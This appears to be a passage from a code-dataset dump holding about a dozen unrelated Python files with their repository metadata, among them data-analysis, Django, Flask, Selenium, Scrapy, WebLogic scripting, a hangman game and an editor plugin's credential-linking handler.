# 38.114754098360656
# question 6
sns.regplot(x=tips.index.values, y=tips['tip'])
plt.title('Tips over time')
plt.xlabel('Row index')
plt.ylabel('Tip')
plt.show()
# question 7
sns.catplot(x='sex', col='time', kind='count', data=tips)
plt.show()
# question 8
sns.boxplot(x='smoker', y='tip', data=tips)
plt.show()
sns.boxplot(x='smoker', y='percentage', data=tips)
plt.show()
# question 9
print(tips.groupby(['day'])['tip'].mean())
# day
# Thur 2.771452
# Fri 2.734737
# Sat 2.993103
# Sun 3.255132
# Name: tip, dtype: float64
print(tips.groupby(['day'])['percentage'].mean())
# day
# Thur 16.126452
# Fri 16.991579
# Sat 15.314598
# Sun 16.689605
# Name: percentage, dtype: float64
# question 10
sns.catplot(x='smoker', col='sex', kind='count', data=tips)
plt.show()
males = tips[tips['sex'] == 'Male']
females = tips[tips['sex'] != 'Male']
male_smokers = males[males['smoker'] == 'Yes']
female_smokers = females[females['smoker'] == 'Yes']
print(len(male_smokers) / len(males))
# 0.3821656050955414
print(len(female_smokers) / len(females))
# 0.3793103448275862
| [
"jimmy.goddard@gmail.com"
] | jimmy.goddard@gmail.com |
77733aa3c3a5f4b351cd39d4466390c280141c03 | 818058887063f94360be7aeb55ef51363ec7334b | /FastFoodFast/asgi.py | 59dbe97db1d17e43073f86d458d1ec1e60243529 | [
"MIT"
] | permissive | Amwata-Albert/Fast-Food | 9521092e2eba5469f4e5f3b85bff8ee68b54d4d7 | 1a6667efb10652852877422616ff80f69c3b066a | refs/heads/master | 2023-01-19T15:55:22.377452 | 2020-11-24T14:26:18 | 2020-11-24T14:26:18 | 311,437,920 | 0 | 0 | NOASSERTION | 2020-11-24T14:26:20 | 2020-11-09T19:04:01 | Python | UTF-8 | Python | false | false | 401 | py | """
ASGI config for FastFoodFast project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'FastFoodFast.settings')
application = get_asgi_application()
| [
"albertotieno41@mail.com"
] | albertotieno41@mail.com |
8277d164b1e7040645a57ce23a1d5194130455d5 | 92768f2f4c732583d469212c7e1b00a9ab136752 | /rplugin/python/floobits/common/handlers/credentials.py | f7adcbf82b941023a6f3f28965a5fa4bff73bd2c | [
"Apache-2.0"
] | permissive | Floobits/floobits-neovim | c02e7ccfcb32c80cd1adece8b1896e3defbe120e | dbfa051e4f097dfa3f46997a2019556a62861258 | refs/heads/master | 2021-11-22T19:23:22.984948 | 2021-10-18T05:48:14 | 2021-10-18T05:48:14 | 26,030,646 | 170 | 11 | Apache-2.0 | 2021-11-03T16:41:50 | 2014-10-31T19:40:06 | Python | UTF-8 | Python | false | false | 2,387 | py | import os
import sys
import uuid
import binascii
import webbrowser
try:
from . import base
from .. import api, shared as G, utils
from ... import editor
from ..exc_fmt import str_e
from ..protocols import no_reconnect
assert api and G and utils
except (ImportError, ValueError):
import base
from floo import editor
from floo.common.protocols import no_reconnect
from floo.common.exc_fmt import str_e
from .. import api, shared as G, utils
class RequestCredentialsHandler(base.BaseHandler):
PROTOCOL = no_reconnect.NoReconnectProto
def __init__(self):
super(RequestCredentialsHandler, self).__init__()
self.token = binascii.b2a_hex(uuid.uuid4().bytes).decode('utf-8')
self.success = False
def build_protocol(self, *args):
proto = super(RequestCredentialsHandler, self).build_protocol(*args)
def on_stop():
self.emit('end', self.success)
self.stop()
proto.once('stop', on_stop)
return proto
def is_ready(self):
return False
def on_connect(self):
webbrowser.open('https://%s/dash/link_editor/%s/%s' % (self.proto.host, self.codename, self.token))
self.send({
'name': 'request_credentials',
'client': self.client,
'platform': sys.platform,
'token': self.token,
'version': G.__VERSION__
})
def _on_credentials(self, data):
s = utils.load_floorc_json()
auth = s.get('AUTH', {})
auth[self.proto.host] = data['credentials']
s['AUTH'] = auth
utils.save_floorc_json(s)
utils.reload_settings()
self.success = utils.can_auth(self.proto.host)
if not self.success:
editor.error_message('Something went wrong. See https://%s/help/floorc to complete the installation.' % self.proto.host)
api.send_error('No username or secret')
else:
p = os.path.join(G.BASE_DIR, 'welcome.md')
with open(p, 'w') as fd:
username = G.AUTH.get(self.proto.host, {}).get('username')
text = editor.LINKED_ACCOUNT_TXT.format(username=username, host=self.proto.host)
fd.write(text)
editor.open_file(p)
try:
self.stop()
except Exception as e:
print(str_e(e))
| [
"bjorn@ambientchill.com"
] | bjorn@ambientchill.com |
1a164b7d02c2408775c790313f51483c12f60fa3 | 0124528676ee3bbaec60df5d6950b408e6da37c8 | /Projects/QTPy/adafruit-circuitpython-bundle-7.x-mpy-20220601/examples/pct2075_high_temp_alert_example.py | 2ec4e88196a8c47dfe88b6d038fdaac9fc2e1030 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | land-boards/lb-boards | 8127658dc537dcfde0bb59a5018ab75c3f0087f6 | eeb98cc2003dac1924845d949f6f5bd387376568 | refs/heads/master | 2023-06-07T15:44:46.110742 | 2023-06-02T22:53:24 | 2023-06-02T22:53:24 | 4,847,305 | 10 | 12 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | # SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
import time
import board
import adafruit_pct2075
i2c = board.I2C() # uses board.SCL and board.SDA
pct = adafruit_pct2075.PCT2075(i2c)
pct.high_temperature_threshold = 35.5
pct.temperature_hysteresis = 30.0
pct.high_temp_active_high = False
print("High temp alert active high? %s" % pct.high_temp_active_high)
# Attach an LED with the Cathode to the INT pin and Anode to 3.3V with a current limiting resistor
while True:
print("Temperature: %.2f C" % pct.temperature)
time.sleep(0.5)
| [
"doug@douglasgilliland.com"
] | doug@douglasgilliland.com |
5482b9e1a19c034e719f9d85304183ee10fb27d2 | fcd9b782b9e0f0973b1ddc45e432091e2e107f39 | /InstantiationScripts/changeSOACoherence.py | 323ed4273b40d9b92dfcef95b908ae09c7e5ac36 | [] | no_license | oktbabs/fmw_repo | 5c8baa0be8185f3846ebc3cea3a2bf07ff4eb0d3 | 3cff15b4c1e1674c038c8d1c3a6d2c7a68035afb | refs/heads/master | 2020-04-09T23:06:09.725008 | 2018-12-06T14:44:11 | 2018-12-06T14:44:11 | 160,646,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,676 | py |
#++++++++++++++++++++++++++++++++++++++++++++++
# Script Name : changeSOACoherence.py +
# Written By : Timmy Babayeju +
# From Company : Fujitsu +
# To Company : FSA +
# Description : Script retrieves the old +
# Coherence Arguments WKA Addresses for SOA & +
# updates with new Coherence WKA Addreseses +
# and Ports for servers in the Cluster +
# Arguments for the SOA cache +
#++++++++++++++++++++++++++++++++++++++++++++++
import wlstModule as wlst
import sys
import string
import traceback
from java.io import File
from java.io import FileOutputStream
f=File('/tmp/appPostLaunch/logs/changeSOACoherence.log')
fos=FileOutputStream(f)
theInterpreter.setOut(fos)
print "==>> Reading Domain Information from " + DOMAIN_HOME
readDomain(DOMAIN_HOME)
SOACACHE=1
while true:
try:
COHSOAServer=eval('SOA_WKA' + str(SOACACHE) + '_SERVER')
# databaseDS=eval('ds' + str(DataS))
try:
COHSOASrv=eval(COHSOAServer)
# COHSOAServerListAddr=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENADDR')
# COHSOAListAddr=eval(COHSOAServerListAddr)
# COHSOAServerListPort=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENPORT')
# COCACHE1=-DOSB.coherence.localhost=sd1oappdu03-osbhost1-vip.fsa.gov.uk -DOSB.coherence.localport=7890 -DOSB.coherence.wka1=sd1oappdu03-osbhost1-vip.fsa.gov.uk -DOSB.coherence.wka1.port=7890 -DOSB.coherence.wka2=sd1oappdu03-osbhost2-vip.fsa.gov.uk -DOSB.coherence.wka2.port=7890
SOACACHE1='-Xms:1536m -Xmx:1536m -Xnohup -d64 -Dtangosol.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + ' -Dtangosol.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + ' -Dtangosol.coherence.localhost=' + SOA_WKA1_SERVERLISTENADDR + ' -Dtangosol.coherence.localport=' + SOA_WKA1_SERVERLISTENPORT + ' -Dtangosol.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + ' -Dtangosol.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
SOACACHE2='-Xms:1536m -Xmx:1536m -Xnohup -d64 -Dtangosol.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + ' -Dtangosol.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + ' -Dtangosol.coherence.localhost=' + SOA_WKA2_SERVERLISTENADDR + ' -Dtangosol.coherence.localport=' + SOA_WKA2_SERVERLISTENPORT + ' -Dtangosol.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + ' -Dtangosol.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
# SOACACHE1='-DOSB.coherence.localhost=' + SOA_WKA1_SERVERLISTENADDR + '-DOSB.coherence.localport=' + SOA_WKA1_SERVERLISTENPORT + '-DOSB.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + '-DOSB.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + '-DOSB.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + '-DOSB.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
# SOACACHE2='-DOSB.coherence.localhost=' + SOA_WKA2_SERVERLISTENADDR + '-DOSB.coherence.localport=' + SOA_WKA2_SERVERLISTENPORT + '-DOSB.coherence.wka1=' + SOA_WKA1_SERVERLISTENADDR + '-DOSB.coherence.wka1.port=' + SOA_WKA1_SERVERLISTENPORT + '-DOSB.coherence.wka2=' + SOA_WKA2_SERVERLISTENADDR + '-DOSB.coherence.wka2.port=' + SOA_WKA2_SERVERLISTENPORT
# URL1='jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=' + dbRACHost1 + ')(PORT=' + dbRACPort + ')))(CONNECT_DATA=(SERVICE_NAME=' + dbRACServiceName + ')(INSTANCE_NAME=' + dbRACInstanceName1+ ')))'
# URL2='jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=' + dbRACHost2 + ')(PORT=' + dbRACPort + ')))(CONNECT_DATA=(SERVICE_NAME=' + dbRACServiceName + ')(INSTANCE_NAME=' + dbRACInstanceName2+ ')))'
# databaseURL=eval('ds' + str(DataS) + '_URL')
# COHSOAServerListAddr=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENADDR')
# COHSOAListAddr=eval(COHSOAServerListAddr)
# COHSOAServerListPort=eval('SOA_WKA' + str(SOACACHE) + '_SERVERLISTENPORT')
# COHSOASArguments=eval('SOA_WKA' + str(SOACACHE) + '_ARGS')
# COHSOASArgs=eval(COHSOASArguments)
# databURL=eval(databaseURL)
COHSOASArguments=eval('SOA_WKA' + str(SOACACHE) + '_ARGS')
COHSOASArgs=eval(COHSOASArguments)
except NameError, ner:
print "Required parameter not specified: "
print ner
sys.exit(-1)
print "==> Updating Coherence Info " + str(SOACACHE) + ": " + COHSOAServer
print " OSB Server : " + COHSOASrv
print " OSB Listen Address 1 : " + SOA_WKA1_SERVERLISTENADDR
print " OSB Listen Port 1 : " + SOA_WKA1_SERVERLISTENPORT
print " OSB Listen Address 2 : " + SOA_WKA2_SERVERLISTENADDR
print " OSB Listen Port 2 : " + SOA_WKA2_SERVERLISTENPORT
# print "setting attributes for mbean type Server"
# a=cd('/JDBCSystemResources/' + databaseDS + '/JDBCResource/' + databaseDS + '/JDBCDriverParams/' + databaseDS)
# cd('/')
# a=cd('/JDBCSystemResource/' + databaseDS + '/JdbcResource/' + databaseDS + '/JDBCDriverParams/NO_NAME_0')
print "setting attributes for mbean type Server"
a=cd('/Servers/' + COHSOASrv + '/ServerStart/' + COHSOASrv)
print " ORIGINAL VALUE : "
print ' '
print a.getArguments()
# cmo.setUrl(dataBURL)
# a.setListenAddress(mServerAddr)
#print a.getdatabaseDS()
#cmo.getUrl()
print 'Setting the new values :'
a.setArguments(COHSOASArgs)
# a.setPasswordEncrypted(sys.argv[1])
print ' '
print " LATEST VALUE : "
print ' '
print a.getArguments()
SOACACHE += 1
except NameError:
break
print "==>> Updating the Domain <<=="
updateDomain()
closeDomain()
print "==>> " + DOMAIN_NAME + " successfully updated"
| [
"oktbabs@gmail.com"
] | oktbabs@gmail.com |
22c0984369b13c085c9a024934cf992870d0fee8 | 1595ffd5cc3ede5cb1b35b5443070fbebe884fd3 | /dataset/92_get-vocab.py | ef1f0459e4eb87e246660810b3a15bc22249edc7 | [
"Apache-2.0"
] | permissive | ewdowiak/Sicilian_Translator | dd986ac687789f12f1a8d5d5a95f1862ca814174 | 135d6224aa7e9b5d6d8ab3949d463d7e1a1452db | refs/heads/main | 2023-03-09T16:27:13.334651 | 2021-09-26T15:03:21 | 2021-09-26T15:03:21 | 172,383,110 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,063 | py | #!/usr/bin/python3
## Copyright 2021 Eryk Wdowiak
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
import mxnet as mx
import gluonnlp as nlp
import re
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
min_freq=1
indir='se31_multi/data-tkn/'
otdir='se31_vocab/'
scfile = indir + 'e2m_train_v1-tkn_sc-en.sc'
enfile = indir + 'm2e_train_v1-tkn_sc-en.en'
scvcbfile = otdir + 'vocab_sc.csv'
envcbfile = otdir + 'vocab_en.csv'
def simple_tkn( src_str , tkn_dlm=' ', seq_dlm='\n'):
splt_str = re.split(tkn_dlm + '|' + seq_dlm, src_str)
return filter(None, splt_str )
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## retrieve Sicilian text
scstr = ""
with open(scfile,"r") as fh:
for line in fh:
scstr = scstr + line
## get Sicilian vocabulary
sccounter = nlp.data.count_tokens(simple_tkn(scstr))
scvocab = nlp.Vocab(sccounter,
unknown_token='<unk>' , padding_token='<pad>',
bos_token='<bos>', eos_token='<eos>',
min_freq=min_freq, max_size=None)
## counts, if you're curious
#scidx_to_counts = [sccounter[w] for w in scvocab.idx_to_token]
## open Sicilian output file
scf = open(scvcbfile,'w')
## print vocab, last word without trailing comma
for i in scvocab.idx_to_token[0:len(scvocab.idx_to_token)]:
word = i
count = sccounter[i]
scf.write( format(count) + '~' + word + "\n" )
## close Sicilian output file
scf.close()
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## retrieve English text
enstr = ""
with open(enfile,"r") as fh:
for line in fh:
enstr = enstr + line
## get English vocabulary
encounter = nlp.data.count_tokens(simple_tkn(enstr))
envocab = nlp.Vocab(encounter,
unknown_token='<unk>' , padding_token='<pad>',
bos_token='<bos>', eos_token='<eos>',
min_freq=min_freq, max_size=None)
## counts, if you're curious
#enidx_to_counts = [encounter[w] for w in envocab.idx_to_token]
## open English output file
enf = open(envcbfile,'w')
## print vocab, last word without trailing comma
for i in envocab.idx_to_token[0:len(envocab.idx_to_token)]:
word = i
count = encounter[i]
enf.write( format(count) + '~' + word + "\n" )
## close English output file
enf.close()
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
| [
"eryk@wdowiak.me"
] | eryk@wdowiak.me |
ac250d7e10667f406ab08f6c594ec3adef79bb13 | dba1606d2ea9c76861d01c2251ff45b0d4efec64 | /LeetCode/39. 组合总和.py | 3a0741cf7ebd3cfa1c1b9361720d978d438e8e42 | [] | no_license | Jack00101/coding | c502087f480d50296eb01cdbba96d2ef26960bef | 4f71a572c24af78f5e6c2006742614f868ced113 | refs/heads/master | 2022-03-02T13:52:19.946260 | 2019-11-01T04:52:48 | 2019-11-01T04:52:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | class Solution:
def combinationSum(self, candidates, target: int, sort=True):
if sort:
candidates = sorted(candidates)
results = []
for ind, i in enumerate(candidates):
if i == target:
results.append([i])
if i < target:
temp = self.combinationSum(candidates[ind:], target - i, False)
for t in temp:
t.append(i)
results.extend(temp)
return results
| [
"noreply@github.com"
] | noreply@github.com |
c77f8b71d8b80ea561f1eec9ef50aee4ebe3840e | 0ff6f65c2da3ddf495b21fb54ae07c1e5c535692 | /juegos/Ahorcado.py | c8ba2bad0792f3a9ab25fac2a0b19bc0342dcd1d | [] | no_license | ldoboga/Bot-discord | 76721ccd8472af7aa161e2159c11a0424ba120fa | 54ed1ff7652a14dbaa90d0a72e9e14b37a63ee59 | refs/heads/main | 2023-07-14T14:47:55.430149 | 2021-08-27T01:26:34 | 2021-08-27T01:26:34 | 388,254,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,907 | py | import random
def leer_archivos():
ARCHIVOS = ('bin\\Cuentos.txt', 'La araña negra - tomo 1.txt', 'Las 1000 Noches y 1 Noche')
with open(ARCHIVOS[0], 'r') as f:
lista = []
data = ''
for line in f:
data = line.rstrip('\n').lower().split()
if data == []:continue
for i in data:
lista.append(i)
return ' '.join(lista)
def quitar_tildes(texto):
VOCALES = [("a","á"),("e","é"),("i","í"),("o","ó"),("u","ú")]
for b,a in VOCALES:
texto = texto.replace(a, b)
return texto.split()
def filtrar_lista(data):
list = []
for word in data:
if len(word) >=5 and word.isalpha():
list.append(word)
return list
def crear_diccionario(lista):
dic_words = {}
for i in lista:
dic_words[i] = dic_words.setdefault(i,0) + 1
return list(dic_words.keys())
def palabras():
texto = leer_archivos()
lista = quitar_tildes(texto)
lista = filtrar_lista(lista)
dic_words = crear_diccionario(lista)
return dic_words
class Ahorcado():
def __init__(self, game_over, jugador):
self.game_over = game_over
self.jugador = jugador
self.palabra = ''
self.palabra_adivinar = ''
self.longitud = 0
self.aciertos = 0
self.desaciertos = 0
self.p_usadas = []
self.p_usadas_fallo = ''
self.LONG_MIN = 5
self.LONG_MAX = 16
def cambiar_valores(self, game_over, jugador):
self.game_over = game_over
self.jugador = jugador
def reiniciar_valores(self):
self.game_over = True
self.jugador = 'jugador'
self.palabra = ''
self.palabra_adivinar = ''
self.longitud = 0
self.aciertos = 0
self.desaciertos = 0
self.p_usadas = []
self.p_usadas_fallo = ''
self.LONG_MIN = 5
self.LONG_MAX = 16
def quien_juega(self):
return '<@' + str(self.jugador) + '> es el jugador de esta partida\n Que longitud de palabra deseas?'
def comprobar_longitud(self, long, user):
return self.game_over == False and self.jugador == user and self.palabra == '' and long >= self.LONG_MIN and long <= self.LONG_MAX
def palabras_por_longitud(self, long, lista):
lista_long = []
for i in lista:
if len(i) == long:
lista_long.append(i)
self.palabra = random.choice(lista_long)
self.palabra_adivinar = '?' * len(self.palabra)
resultado = 'Palabra a adivinar: ' + str(self.palabra_adivinar) + ' | desaciertos: ' + str(self.desaciertos) + ' | aciertos: ' + str(self.aciertos)
return resultado
def respuestas_longitud(self, long, user):
if self.game_over:
resultado = 'Debes iniciar unar partida'
elif self.jugador != user:
resultado = 'No eres el jugador de esta partida'
elif long < self.LONG_MIN or long > self.LONG_MAX:
resultado = 'La longitud no es valida. ingresa una longitud entre 5 y 16'
elif not self.game_over and self.palabra != '':
resultado = 'Ya hay una partida en juego'
return resultado
def comprobar_letra(self, letra, user):
return letra.isalpha() and self.jugador == user and not self.game_over and letra not in self.p_usadas and self.palabra != '' and len(letra) == 1
def respuesta_letra(self, letra, user):
if self.game_over:
resultado = 'Debes iniciar unar partida'
elif self.jugador != user:
resultado = 'No eres el jugador de esta partida'
elif not letra.isalpha():
resultado = 'Tenes que enviar una letra no un numero'
elif len(letra) != 1:
resultado = 'Solo puede enviar una letra'
elif letra in self.p_usadas:
resultado = 'La letra ya esta en uso'
elif self.palabra == '' and not self.game_over:
resultado = 'Debes enviar una longitud antes de enviar una letra'
return resultado
def letra_en_palabra(self, letra):
self.p_usadas.append(letra)
contador = self.palabra.count(letra)
self.palabra_adivinar = self.palabra_acierto(letra)
print(self.palabra_adivinar)
if contador == 0:
self.p_usadas_fallo = self.p_usadas_fallo + letra + " - "
self.desaciertos += 1
resultado = "Lo siento!!! → " + str(self.palabra_adivinar) + " | Aciertos: " + str(self.aciertos) + " | Desaciertos: " + str(self.desaciertos) + " - " + str(self.p_usadas_fallo)
elif contador > 0:
self.aciertos += 1
resultado = "Bien hecho!!! → " + str(self.palabra_adivinar) + " | Aciertos: " + str(self.aciertos) + " | Desaciertos: " + str(self.desaciertos) + " - " + str(self.p_usadas_fallo)
return resultado
def palabra_acierto(self, letra):
palabra_aux = self.palabra_adivinar
palabra_sin_adivinar = ""
for i in range(len(self.palabra_adivinar)):
if self.palabra[i] == letra:
palabra_sin_adivinar += letra
elif palabra_aux[i] != "?":
palabra_sin_adivinar += palabra_aux[i]
else:
palabra_sin_adivinar += "?"
return palabra_sin_adivinar
def comprobar_victoria(self):
return self.palabra == self.palabra_adivinar or self.desaciertos >= 8
def ganar_o_perder(self):
if self.palabra == self.palabra_adivinar:
resultado = 'Felicidades <@' + str(self.jugador) +'> ganaste el juego'
self.reiniciar_valores()
elif self.desaciertos >= 8:
resultado = 'Lo lamento <@' + str(self.jugador) + '> pero perdiste'
self.reiniciar_valores()
return resultado | [
"bogadofedericoezequiel@gmail.com"
] | bogadofedericoezequiel@gmail.com |
f8fdb29e897fa128d24ffc589aefca92f2b0bd24 | a7b1f827def23135663625426d11b1c57b02fdd9 | /2_3_alerts/2_3_step3_alert1.py | 3de4e106a245dec60b5ae04c2cc451e6e8abc2ab | [] | no_license | Michael-uniq/selenium_stepik_learn | e6421221b0cfc7d469a0fcc12635cb44369e6d35 | 5ba6762aaeb7cdf5f2ad43db4660b0eff9b48992 | refs/heads/master | 2021-06-18T09:39:12.348198 | 2019-10-05T19:00:52 | 2019-10-05T19:00:52 | 212,150,595 | 0 | 0 | null | 2021-06-02T00:30:03 | 2019-10-01T16:54:53 | Python | UTF-8 | Python | false | false | 887 | py | from selenium import webdriver
import time
from utils import print_answer, calc
from selenium.webdriver.common.by import By
link = "http://suninjuly.github.io/alert_accept.html"
browser = webdriver.Chrome()
browser.get(link)
try:
btn = browser.find_element_by_class_name('btn')
btn.click()
print_answer(browser)
x_el = browser.find_element(By.ID, 'input_value')
x = x_el.text
# Ваш код, который заполняет обязательные поля
browser.find_element_by_id("answer").send_keys(calc(x))
# Отправляем заполненную форму
button = browser.find_element_by_class_name("btn")
button.click()
# Проверяем, что смогли зарегистрироваться
# ждем загрузки страницы
time.sleep(1)
print_answer(browser)
finally:
browser.quit()
| [
"michael.co@ya.ru"
] | michael.co@ya.ru |
0785c4045308368283d3ef833fe22fa1dd6852ba | 82097740587821af4af9b41ba9ae14638d20eb69 | /Flask/flaskproject/models.py | 156ead3900d1fc71edca30e0dac340333c6c314e | [] | no_license | dasdasda21/flask | d592c8fa90ea90bdf9adb38b6b0d8b6d8b621967 | 207e863209f670bc8360084fed2e038db727c10b | refs/heads/master | 2020-07-30T12:48:15.417540 | 2019-10-07T13:12:42 | 2019-10-07T13:12:42 | 210,239,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | from main import models
class BaseModel(models.Model):
__abstract__ =True
id = models.Column(models.Integer,primary_key=True,autoincrement=True)
def save(self):
db = models.session()
db.add(self)
db.commit()
def delete(self):
db = models.session()
db.delete(self)
db.commit()
class Curriculum(BaseModel):
__tablename__ ="curriculum"
c_id = models.Column(models.String(32))
c_name = models.Column(models.String(32))
c_time = models.Column(models.Date)
class User(BaseModel):
__tablename__ = "user"
user_name = models.Column(models.String(32))
password = models.Column(models.String(32))
email = models.Column(models.String(32))
class Leave(BaseModel):
"""
请假0
批准1
驳回2
销假3
"""
__tablename__ = "leave"
request_id = models.Column(models.Integer) #请假人id
request_name = models.Column(models.String(32))#请假人姓名
request_type = models.Column(models.String(32))#假期类型
request_start_time = models.Column(models.String(32))#起始时间
request_end_time = models.Column(models.String(32))#结束时间
request_description = models.Column(models.Text)#请假事由
request_phone = models.Column(models.String(32))#联系方式
request_status = models.Column(models.String(32))#假条状态
class Picture(BaseModel):
picture = models.Column(models.String(64)) | [
"zhangsan.caom"
] | zhangsan.caom |
8b4c3ac988b0f45270e383cbf96bdd84bb4ef0b3 | c347d18581177f4a1ed460d57f51906b1c1065e5 | /SDK/wxPythonTextfield.py | 1fe4c8390e723a13021b31eb8aac76fd00e984c1 | [] | no_license | mr-huangjian/Python | da2184f51e03c60dd72e392e8afa9f540a9497ef | 7e0a421d922d377270547afbc9029f7627506f2b | refs/heads/master | 2021-06-28T09:01:56.487917 | 2017-09-19T09:57:33 | 2017-09-19T09:57:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | # coding: utf-8 python2
# created by mr.huangjian@foxmail.com on 2017/7/1.
import wx
class Textfield(wx.TextCtrl):
def __init__(self, superview, style=0):
wx.TextCtrl.__init__(self, superview, -1, style=style)
def text(self, text):
self.SetLabelText(text)
def gettext(self):
return self.GetValue()
def origin(self, origin):
self.SetPosition(origin)
def size(self, size):
self.SetSize(size)
def font(self, font):
self.SetFont(wx.Font(font, wx.ROMAN, wx.NORMAL, wx.NORMAL))
def textcolor(self, textcolor):
self.SetForegroundColour(textcolor)
| [
"mr.huangjian@foxmail.com"
] | mr.huangjian@foxmail.com |
8ebd576a5c0651eb84ceff4de6e7daa1b0798574 | 5ec06dab1409d790496ce082dacb321392b32fe9 | /clients/python/generated/test/test_com_adobe_granite_repository_hc_impl_authorizable_node_name_health_check_properties.py | 3a604357918c8edc66ecdea80b46d7424d41f966 | [
"Apache-2.0"
] | permissive | shinesolutions/swagger-aem-osgi | e9d2385f44bee70e5bbdc0d577e99a9f2525266f | c2f6e076971d2592c1cbd3f70695c679e807396b | refs/heads/master | 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 | Apache-2.0 | 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null | UTF-8 | Python | false | false | 1,487 | py | # coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.com_adobe_granite_repository_hc_impl_authorizable_node_name_health_check_properties import ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties(unittest.TestCase):
"""ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties(self):
"""Test ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.com_adobe_granite_repository_hc_impl_authorizable_node_name_health_check_properties.ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"michael.bloch@shinesolutions.com"
] | michael.bloch@shinesolutions.com |
061fe85a1d6cca2865862da0c133cc36a11f4ecb | 4f6c5a21840f630eab748fa64f79f3d15e33315a | /upload/1386125709792681985/news/master/master/settings.py | 29039ffdeae32373f1ae85b4d7954455d440d93e | [] | no_license | taozi926494/collectplatform | 802af97f0fcb0c8f670e616011e7e2db10edda82 | fb9bc32a99335340cb4e11f18a6e9d5e1effb17a | refs/heads/master | 2023-04-15T00:38:36.869680 | 2021-04-28T02:35:39 | 2021-04-28T02:35:39 | 357,378,396 | 0 | 4 | null | 2021-04-28T02:35:40 | 2021-04-13T00:36:49 | Java | UTF-8 | Python | false | false | 918 | py | # -*- coding: utf-8 -*-
BOT_NAME = '{{project_name}}'
SPIDER_MODULES = ['{{project_name}}.spiders']
NEWSPIDER_MODULE = '{{project_name}}.spiders'
ROBOTSTXT_OBEY = False
CONCURRENT_REQUESTS = 1
DOWNLOAD_DELAY = 1
DOWNLOADER_MIDDLEWARES = {
# 'master.middlewares.UserAgent': 1,
# 'master.middlewares.MasterDownloaderMiddleware': 543,
}
ITEM_PIPELINES = {
'{{project_name}}.pipelines.__ProjectNamecapitalize__MasterPipeline': 300,
}
# scrapy-redis 配置
REDIS_HOST = '172.16.119.6'
REDIS_PORT = 6379
# 去重类,要使用Bloom Filter请替换DUPEFILTER_CLASS
DUPEFILTER_CLASS = "scrapy_redis_bloomfilter.dupefilter.RFPDupeFilter"
# # 散列函数的个数,默认为6,可以自行修改
BLOOMFILTER_HASH_NUMBER = 6
# # Bloom Filter的bit5数,默认30,2^30 = 10亿位=10亿/8 字节=128MB空间,去重量级1亿
BLOOMFILTER_BIT = 25
SCHEDULER = "scrapy_redis_bloomfilter.scheduler.Scheduler"
| [
"bestfuqiang@163.com"
] | bestfuqiang@163.com |
